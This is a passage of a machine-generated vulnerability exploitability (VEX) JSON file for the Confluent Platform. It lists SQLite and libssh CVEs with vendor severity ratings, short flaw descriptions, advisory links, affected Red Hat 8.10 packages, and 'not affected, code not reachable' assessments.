          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-70873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        244
      ],
      "description": "An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory via supplying a crafted ZIP file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-70873"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-70873"
        },
        {
          "url": "https://gist.github.com/cnwangjihe/f496393f30f5ecec5b18c8f5ab072054"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70873"
        },
        {
          "url": "https://sqlite.org/forum/forumpost/761eac3c82"
        },
        {
          "url": "https://sqlite.org/src/info/3d459f1fb1bd1b5e"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
        }
      ],
      "published": "2026-03-12T19:16:15+00:00",
      "updated": "2026-06-17T10:03:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-8114",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "A flaw was found in libssh, a library that implements the SSH protocol. When calculating the session ID during the key exchange (KEX) process, an allocation failure in cryptographic functions may lead to a NULL pointer dereference. This issue can cause the client or server to crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-8114"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-8114"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=53ac23ded4cb2c5463f6c4cd1525331bd578812d"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=65f363c9"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-8114.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8114"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7849-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-8114"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-8114.txt"
        }
      ],
      "published": "2025-07-24T15:15:27+00:00",
      "updated": "2026-06-30T02:16:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-8277",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was found in libssh's handling of key exchange (KEX) processes when a client repeatedly sends incorrect KEX guesses. The library fails to free memory during these rekey operations, which can gradually exhaust system memory. This issue can lead to crashes on the client side, particularly when using libgcrypt, which impacts application stability and availability.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-8277"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-8277"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-8277.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8277"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8051-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-8277"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-8277.txt"
        }
      ],
      "published": "2025-09-09T12:15:30+00:00",
      "updated": "2026-06-30T09:16:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
